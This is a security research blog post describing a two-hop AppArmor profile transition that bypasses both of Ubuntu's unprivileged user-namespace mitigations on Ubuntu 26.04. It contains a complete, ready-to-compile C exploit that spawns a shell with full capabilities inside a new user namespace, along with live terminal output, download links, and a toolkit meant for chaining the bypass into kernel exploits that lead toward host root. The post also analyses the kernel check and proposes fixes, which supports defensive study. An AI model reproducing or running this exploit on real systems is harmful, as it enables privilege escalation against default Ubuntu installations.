bypass-pwn: defeating Canonical's patch for the unprivileged-userns bypass

2026-05-05 · linux · apparmor · kernel · userns · ubuntu · bypass

in March 2025 Qualys TRU dropped three bypasses of Ubuntu's apparmor_restrict_unprivileged_userns=1 mitigation. Canonical answered with a new kernel sysctl, kernel.apparmor_restrict_unprivileged_unconfined=1, which force-stacks any target profile against the global-unconfined label and shuts the single-hop transitions Qualys used. i'd already been poking at the crun/chrome profile pair for aa-rootns, and the question after that patch was whether a second hop could walk around the new gate.

it can. a two-hop AppArmor profile transition walks straight through the sysctl. the first hop moves the label off the global-unconfined sentinel, the second hop slips past the stacking check, and what you land in is pure-unconfined with full caps inside a fresh user namespace. i verified it live on Ubuntu 26.04 LTS Resolute, production kernel 7.0.0-15-generic, both sysctls enabled, from a clean unprivileged user with no group memberships.

demo

box: stock Ubuntu 26.04 LTS Resolute (resolute-desk).
user: np, uid 1001, primary-group-only, no sudo, no plugdev, no kvm, no docker, no lxd.
sysctls: both Canonical mitigations on at their default (=1).
kernel: 7.0.0-15-generic (production-equivalent, no KASAN).

[demo recording: bypass-pwn firing on Ubuntu 26.04 LTS Resolute as np (uid 1001) with both apparmor sysctls enabled]

background and credit chain

Date	What happened
Jun 2023	Google's kCTF VRP report shows 44% of Linux kernel exploits used unprivileged user namespaces.
Oct 2023	Ubuntu 23.10 ships `apparmor_restrict_unprivileged_userns`. Citing Google.
Apr 2024	Ubuntu 24.04 LTS, mitigation default-on.
Jan 15 2025	Qualys TRU privately discloses three bypasses to Canonical.
Mar 27 2025	Qualys publishes the three bypasses: `aa-exec` into chrome / crun / busybox / nautilus / trinity / flatpak; `busybox sh` using its own profile; `LD_PRELOAD` a shell into nautilus. Canonical responds: "These are not security vulnerabilities."
Apr 2025	Canonical patches anyway. New sysctl `kernel.apparmor_restrict_unprivileged_unconfined` + new branch `aa_unprivileged_unconfined_restricted` in `change_profile_perms`. Single-hop transitions from global-unconfined now force-stack the target profile, inheriting the restriction.
Jun 26 2025	DEVCORE writes up the kernel-side analysis of the same check, but explicitly notes: "The bypass method works only when `apparmor_restrict_unprivileged_unconfined` is disabled (i.e., set to 0)."
Mar 12 2026	Qualys CrackArmor: nine bugs in AppArmor's parser/policy engine. Different surface (custom profile loading, DFA OOB, kernel stack exhaustion). Doesn't cover the sysctl-on case for shipped profiles.
May 5 2026 (today)	This post. Two-hop bypass of Canonical's patch, with both sysctls on. From np (no groups) on stock 26.04 LTS.

Google motivated the original mitigation. Qualys forced Canonical to ship the second sysctl. DEVCORE documented the kernel check but assumed the sysctl-on case was closed. nobody published the post-patch state until now.

the patch and where it leaks

the branch that matters lives at security/apparmor/domain.c in the Resolute 7.0.0 kernel:

if (!stack && unconfined(label) &&
    label == &labels_ns(label)->unconfined->label &&
    aa_unprivileged_unconfined_restricted &&
    cap_capable(current_cred(), &init_user_ns, CAP_MAC_OVERRIDE,
                CAP_OPT_NOAUDIT)) {
    /* regardless of the request in this case apparmor
     * stacks against unconfined so admin set policy can't be
     * by-passed
     */
    stack = true;
    ...
}

all five conditions have to hold for the branch to fire:

!stack: the caller did not already ask for a stacking transition
unconfined(label): current label is some unconfined variant
label == &labels_ns(label)->unconfined->label: current label is the exact global-unconfined sentinel pointer
aa_unprivileged_unconfined_restricted: the new sysctl is on
cap_capable(...) returns nonzero: caller does not hold CAP_MAC_OVERRIDE in init_user_ns
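
to make the five-way AND concrete, here is a toy userspace model of the gate. it is a sketch, not kernel code: struct task_model, its fields, and gate_forces_stack are names invented for illustration, and each boolean stands in for one of the conditions listed above.

```c
#include <stdbool.h>

/* Toy userspace model of the stacking gate. NOT kernel code.
 * The struct and its field names are hypothetical; each field
 * mirrors one condition from the list above. */
struct task_model {
    bool already_stacking;   /* the caller requested a stack transition */
    bool label_unconfined;   /* unconfined(label) */
    bool label_is_sentinel;  /* label == &labels_ns(label)->unconfined->label */
    bool has_mac_override;   /* holds CAP_MAC_OVERRIDE in init_user_ns */
};

/* Returns true when the modeled branch would set stack = true. */
static bool gate_forces_stack(const struct task_model *t, bool sysctl_on)
{
    return !t->already_stacking &&
           t->label_unconfined &&
           t->label_is_sentinel &&
           sysctl_on &&
           !t->has_mac_override;
}
```

with the sysctl on, a task sitting on the sentinel gets force-stacked, while a task whose label is merely an unconfined variant (label_is_sentinel false) does not. that asymmetry is the whole story of the second hop.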

the third condition is the load-bearing one. it's an identity check, and it only catches processes whose label is the singleton global-unconfined sentinel. the moment you hop into any named profile your label is no longer that pointer. now it's something like crun//&unconfined (stacked, because hop 1 fires the patch) or even just crun, and the next change_profile call sees a different label and skips the stacking branch.

so hop 1 eats the cap-strip stacking but moves us off the sentinel. hop 2 transitions cleanly, no stacking, and lands in chrome (unconfined). that's pure-unconfined, and unshare(CLONE_NEWUSER) from there hands back the full 0x000001ffffffffff cap bitmap inside the new userns.
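
for reading bitmaps like that one, a small helper is enough. this is a minimal sketch; cap_count and cap_is_set are illustrative names, and the capability numbers in the comment (12 for CAP_NET_ADMIN, 21 for CAP_SYS_ADMIN) come from linux/capability.h.

```c
#include <stdint.h>

/* Count the capability bits set in a CapEff-style 64-bit mask. */
static int cap_count(uint64_t mask)
{
    int n = 0;
    while (mask) {
        mask &= mask - 1;   /* clear the lowest set bit */
        n++;
    }
    return n;
}

/* Test a single capability number, e.g. 12 (CAP_NET_ADMIN)
 * or 21 (CAP_SYS_ADMIN). Returns 1 if set, 0 otherwise. */
static int cap_is_set(uint64_t mask, unsigned cap)
{
    return cap < 64 && ((mask >> cap) & 1u);
}
```

cap_count(0x000001ffffffffffULL) comes out to 41, i.e. capability numbers 0 through 40 are all set.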

the label transitions during the run show up in the demo:

[*] stage 0: laundering via crun
[label] unconfined                            ← global-unconfined sentinel
[*] stage 1: now under crun, transitioning to chrome
[label] crun//&unconfined (unconfined)        ← stacking branch fired (Canonical's patch worked once)
[*] stage 2: under chrome, unshare(CLONE_NEWUSER)
[label] chrome (unconfined)                   ← stacking branch did NOT fire (label != sentinel)
[after-unshare] uid=0 euid=0 caps=0x000001ff_ffffffff
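
if you want to classify those [label] lines programmatically, say in an audit script that watches for stacked or unconfined-mode labels, something like the following works on the strings as printed above. it is a string-level heuristic, not the kernel's pointer comparison, and the function names are made up for this sketch. it assumes the label has already been read from /proc/self/attr/current with the trailing newline stripped.

```c
#include <string.h>

/* Heuristic: a stacked label prints its components joined by "//&". */
static int label_is_stacked(const char *label)
{
    return strstr(label, "//&") != NULL;
}

/* Heuristic: the plain unconfined label prints as exactly "unconfined". */
static int label_is_plain_unconfined(const char *label)
{
    return strcmp(label, "unconfined") == 0;
}

/* Copy the trailing "(mode)" suffix, without the parentheses, into out.
 * Returns 0 on success, -1 if there is no suffix or out is too small. */
static int label_mode(const char *label, char *out, size_t outsz)
{
    const char *open = strrchr(label, '(');
    const char *close = strrchr(label, ')');
    if (!open || !close || close < open || close[1] != '\0')
        return -1;
    size_t len = (size_t)(close - open - 1);
    if (len + 1 > outsz)
        return -1;
    memcpy(out, open + 1, len);
    out[len] = '\0';
    return 0;
}
```

on the three labels from the run: "unconfined" is plain and unstacked, "crun//&unconfined (unconfined)" is stacked, and "chrome (unconfined)" is unstacked with mode "unconfined".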

confirmed live

two boxes, two kernels, both fire:

$ ssh np@resolute-desk
np@resolute-desk:~$ id
uid=1001(np) gid=1001(np) groups=1001(np)

np@resolute-desk:~$ uname -r
7.0.0-15-generic

np@resolute-desk:~$ echo "userns_sysctl=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns) \
                          unconfined_sysctl=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_unconfined)"
userns_sysctl=1  unconfined_sysctl=1

np@resolute-desk:~$ /tmp/bypass-pwn
[*] stage 0: laundering via crun
[label] unconfined
[*] stage 1: now under crun, transitioning to chrome
[label] crun//&unconfined (unconfined)
[*] stage 2: under chrome, unshare(CLONE_NEWUSER)
[label] chrome (unconfined)
[after-unshare] uid=0 euid=0 caps=0x000001ff_ffffffff
[+] BYPASS - popping shell with CAP_NET_ADMIN+CAP_SYS_ADMIN in new userns

root@resolute-desk:~# id
uid=0(root) gid=0(root) groups=0(root)

root@resolute-desk:~# cat /proc/self/status | grep ^Cap
CapInh: 0000000000000000
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000

same primitive, same outcome on the lab fuzzing kernel (7.1.0-rc1-kasan). this isn't a function of the build. it's the kernel branch above, which is upstream-Resolute as of 26.04 LTS.

the exploit

single-file C, ~120 lines. it self-stages through crun → chrome by re-exec, transitions on each via /proc/self/attr/exec, unshares the user namespace under chrome, writes uid/gid maps, drops a shell. no external dependencies, not even aa-exec, so it runs on minimal Ubuntu Server installs that don't ship apparmor-utils.

/*
 * AppArmor unprivileged user namespace restriction bypass
 * Ubuntu Resolute 26.04 LTS
 *
 * Bypasses BOTH:
 *   kernel.apparmor_restrict_unprivileged_userns         = 1
 *   kernel.apparmor_restrict_unprivileged_unconfined     = 1
 *
 * The second sysctl was added by Canonical in response to the March 2025
 * Qualys advisory. It works by stacking the target profile with the
 * caller's existing label whenever the caller is the *global* unconfined
 * label (security/apparmor/domain.c, the aa_unprivileged_unconfined_restricted
 * branch in change_profile_perms).
 *
 * The check is `label == &labels_ns(label)->unconfined->label` -- it only
 * fires when the current label IS that exact global-unconfined sentinel.
 * After ANY transition to a non-unconfined named profile, the next
 * change_profile call sees a different label and the stacking branch is
 * skipped. The second hop transitions cleanly into a `flags=(unconfined)`
 * profile that has an explicit `userns,` allow rule.
 *
 * Build: gcc -O2 -o bypass-pwn bypass-pwn.c
 * Run:   ./bypass-pwn
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/syscall.h>
#include <linux/capability.h>

#define HOP1 "crun"
#define HOP2 "chrome"

static int change_onexec(const char *profile) {
    int fd = open("/proc/self/attr/exec", O_WRONLY);
    if (fd < 0) return -1;
    char buf[256];
    int n = snprintf(buf, sizeof buf, "exec %s", profile);
    int r = write(fd, buf, n);
    close(fd);
    return (r == n) ? 0 : -1;
}

static void check_caps(const char *tag) {
    struct __user_cap_header_struct hdr = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct data[2] = {0};
    syscall(SYS_capget, &hdr, data);
    fprintf(stderr, "[%s] uid=%d euid=%d caps=0x%08x_%08x\n", tag,
        getuid(), geteuid(), data[1].effective, data[0].effective);
}

static void print_label(void) {
    int fd = open("/proc/self/attr/current", O_RDONLY); if (fd < 0) return;
    char b[256] = {0}; (void)!read(fd, b, sizeof b - 1); close(fd);
    char *nl = strchr(b, '\n'); if (nl) *nl = 0;
    fprintf(stderr, "[label] %s\n", b);
}

int main(int argc, char **argv) {
    char *self = argv[0];

    if (argc == 1) {
        fprintf(stderr, "[*] stage 0: laundering via %s\n", HOP1);
        print_label();
        if (change_onexec(HOP1) < 0) { perror("change_onexec(crun)"); return 1; }
        char *na[] = { self, "stage1", NULL };
        execv("/proc/self/exe", na);
        return 1;
    }

    if (!strcmp(argv[1], "stage1")) {
        fprintf(stderr, "[*] stage 1: now under %s, transitioning to %s\n", HOP1, HOP2);
        print_label();
        if (change_onexec(HOP2) < 0) { perror("change_onexec(chrome)"); return 1; }
        char *na[] = { self, "stage2", NULL };
        execv("/proc/self/exe", na);
        return 1;
    }

    if (!strcmp(argv[1], "stage2")) {
        fprintf(stderr, "[*] stage 2: under %s, unshare(CLONE_NEWUSER)\n", HOP2);
        print_label();
        uid_t outer_uid = getuid();
        gid_t outer_gid = getgid();
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { perror("unshare"); return 1; }
        int fd = open("/proc/self/setgroups", O_WRONLY);
        if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
        fd = open("/proc/self/uid_map", O_WRONLY);
        if (fd >= 0) {
            char buf[64]; int n = snprintf(buf, sizeof buf, "0 %d 1", outer_uid);
            (void)!write(fd, buf, n); close(fd);
        }
        fd = open("/proc/self/gid_map", O_WRONLY);
        if (fd >= 0) {
            char buf[64]; int n = snprintf(buf, sizeof buf, "0 %d 1", outer_gid);
            (void)!write(fd, buf, n); close(fd);
        }
        check_caps("after-unshare");
        fprintf(stderr, "[+] BYPASS - popping shell with CAP_NET_ADMIN+CAP_SYS_ADMIN in new userns\n");
        char *sh[] = { "/bin/bash", NULL };
        execv("/bin/bash", sh);
        return 1;
    }
    return 1;
}

there's a companion toolkit version, aa-rootns. it adds ambient cap-laundering so the caps survive the next execv, plus a -- cmd args... mode for embedding the bypass into other PoCs that need CAP_SYS_ADMIN-in-userns reach. same primitive, different ergonomics.

what you get and what you don't

gets you: a userns where you are uid 0 with the full 41-cap bitmap, on a default Ubuntu 26.04 LTS install with both Canonical mitigations enabled. from here, every kernel CVE writeup that ended with "but apparmor_restrict_unprivileged_userns=1 blocks reach on Ubuntu" or "but apparmor_restrict_unprivileged_unconfined=1 closes that on post-Qualys patched kernels" needs a re-read. the reach gate they were quoting is open on a current LTS, on a default install, from an unprivileged user.

bug classes this re-opens:

ns_capable(CAP_NET_ADMIN) bugs. nft, vxlan, tc, fib, every netlink surface that gates on namespace caps.
ns_capable(CAP_BPF) when kernel.unprivileged_bpf_disabled uses the BPF cap.
ns_capable(CAP_SYS_ADMIN) in sunrpc, tipc, vsock, keyring management, per-netns proc files whose owner is set via make_kuid(net->user_ns, 0) at netns-creation time.
RCU/refcount races whose precondition is "be inside a userns you own."

does not get you: host root. anything checked against init_user_ns (loadable kernel modules, FS_USERNS_MOUNT-less filesystem mounts, raw IO, ptrace of host processes, init-owned DAC bits) still fails. this is the bouncer waving you in, not the throne. pair it with a kernel bug that needs ns_capable(...) (the public CVE pile has plenty) and the next stage is host root. two steps.

why this is still hard to fix

the patch Canonical shipped in 2025 made the right structural call. when an unprivileged process tries to enter a permissive named profile from unconfined, force-stack the target so the new label inherits the original restriction. the flaw is the identity check. only the global-unconfined sentinel counts as "really unconfined." everything else, a freshly-stacked crun//&unconfined included, is treated as already-confined and gets the ordinary change-profile path.

a real fix is probably one of:

1. Force-stack on any transition out of an unconfined ancestor, not just from the sentinel.
2. Strip the userns, rule from chrome, crun, and the long tail of shipped flags=(unconfined)+userns, profiles. breaks the runtimes that need them.
3. Require the AppArmor LSM to track "ever was unconfined this transition chain" and inherit the cap-strip across hops.

the second option breaks chrome's sandbox model, crun's container creation, and a long list of other shipped profiles (brave, buildah, code, 1password, Discord, firefox, flatpak, github-desktop, keybase, linux-sandbox, MongoDB_Compass, ...) that need userns to run at all.

the first and third options are real engineering changes inside AppArmor's domain.c, and they have to land without breaking the nested-confinement and profile-stacking semantics other AppArmor users depend on. until then the hole stays open.
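
to show the shape of the "ever was unconfined" idea, here is a toy model with a sticky bit that is inherited across hops. this is a hedged sketch of the concept only: label_model, from_unconfined, and the three functions are hypothetical names, and nothing here reflects how AppArmor actually represents labels or how a real fix would be written.

```c
#include <stdbool.h>

/* Toy model only. Field and function names are hypothetical. */
struct label_model {
    bool is_sentinel;      /* exactly the global-unconfined label */
    bool from_unconfined;  /* sticky: the chain started at the sentinel */
};

/* The gate as described in this post: only the sentinel triggers stacking. */
static bool current_gate(const struct label_model *l)
{
    return l->is_sentinel;
}

/* Sketch of the tracking idea: the sticky bit also triggers stacking. */
static bool sticky_gate(const struct label_model *l)
{
    return l->is_sentinel || l->from_unconfined;
}

/* Label after one transition into a named profile. The new label is
 * never the sentinel; the sticky bit is inherited and never cleared. */
static struct label_model after_hop(const struct label_model *l)
{
    struct label_model next = { false, l->is_sentinel || l->from_unconfined };
    return next;
}
```

in this model current_gate stops firing after the first hop, while sticky_gate keeps firing on every later hop in the chain. the hard part the model ignores is exactly what the paragraph above names: doing this without disturbing existing stacking and nested-confinement semantics.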

reproduction notes

Stock Ubuntu 26.04 LTS Resolute (no patches beyond apt).
Both apparmor_restrict_unprivileged_userns and apparmor_restrict_unprivileged_unconfined at their default value of 1.
Kernel 7.0.0-15-generic on production-equivalent build, 7.1.0-rc1-kasan-sickfuzz+ on the lab fuzzing build. both fire.
User np: uid 1001, primary group only, no sudo, no plugdev, no kvm, no docker, no lxd.
Both chrome and crun profiles ship in the base apparmor package (Priority: standard, base install). chrome binary not actually required. only the loaded profile is.
Build: gcc -O2 -Wall -o bypass-pwn bypass-pwn.c. No external deps.
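
to confirm a test box matches these preconditions before drawing conclusions from a run, the two sysctl files can be read directly. a minimal sketch: read_sysctl_int and both_mitigations_on are illustrative helper names, and the two paths are the ones shown in the transcript earlier in this post.

```c
#include <stdio.h>

/* Read a single integer from a /proc/sys file.
 * Returns -1 if the file is missing, unreadable, or not an integer. */
static int read_sysctl_int(const char *path)
{
    FILE *f = fopen(path, "r");
    int v = -1;
    if (!f)
        return -1;
    if (fscanf(f, "%d", &v) != 1)
        v = -1;
    fclose(f);
    return v;
}

/* Returns 1 when both mitigations read back as 1, 0 otherwise
 * (including on kernels where either file does not exist). */
static int both_mitigations_on(void)
{
    return read_sysctl_int("/proc/sys/kernel/apparmor_restrict_unprivileged_userns") == 1 &&
           read_sysctl_int("/proc/sys/kernel/apparmor_restrict_unprivileged_unconfined") == 1;
}
```

a -1 from read_sysctl_int usually means the kernel does not expose that sysctl at all, which is worth distinguishing from a value of 0.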

downloads

bypass-pwn.c: the exploit, single-file C, no deps. gcc -O2 -o bypass-pwn bypass-pwn.c.
bypass-pwn-demo.gif: the demo recording above.
aa-rootns.c: toolkit derivative with cap-launder and -- cmd args mode for embedding into other PoCs.

SHA-256:

821cedccb1bec8226cc0a56232407c64dcf41c4da61d94def559b180cc717ab1  bypass-pwn.c
3eff371b47f73a48812c3264cdc9b552beaaf0cbd9afacb29045dc4edafba698  aa-rootns.c

credits

Google Security: kCTF VRP analysis; the 44%-of-exploits stat that motivated Ubuntu's userns mitigation in the first place.
Qualys TRU: three bypasses, March 2025. Forced Canonical to ship the second sysctl that this post bypasses. Most of the public AppArmor / userns work in this space is theirs, and they are also behind Looney Tunables and now CrackArmor in March 2026.
DEVCORE: kernel-side analysis of the same check, June 2025. Identified the label == unconfined structure in aa_profile_ns_perm; explicitly noted their bypass needed apparmor_restrict_unprivileged_unconfined=0. This post is the answer to the open question their writeup left.
Canonical AppArmor team: the patch shape (force-stack on transition from sentinel) is the right call. The hole is in the identity check, not the architecture.

if you've published a writeup on the sysctl-on case and want a citation, mail in. if you're on the AppArmor team and want to talk fix shape, also mail in.

. _SiCk · afflicted.sh